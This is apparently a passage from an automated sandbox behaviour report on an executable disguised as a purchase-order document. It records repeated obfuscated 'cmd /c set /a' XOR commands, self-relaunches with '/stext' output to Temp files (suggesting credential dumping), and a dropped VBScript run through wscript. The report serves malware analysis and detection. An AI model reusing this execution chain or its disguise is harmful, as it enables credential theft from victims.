              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\dfsjvxzdl"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\dfsjvxzdl"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\blnru"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\dfsjvxzdl"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\ohfuvpkfznra"Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs" Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSection loaded: profapi.dllJump to behavior
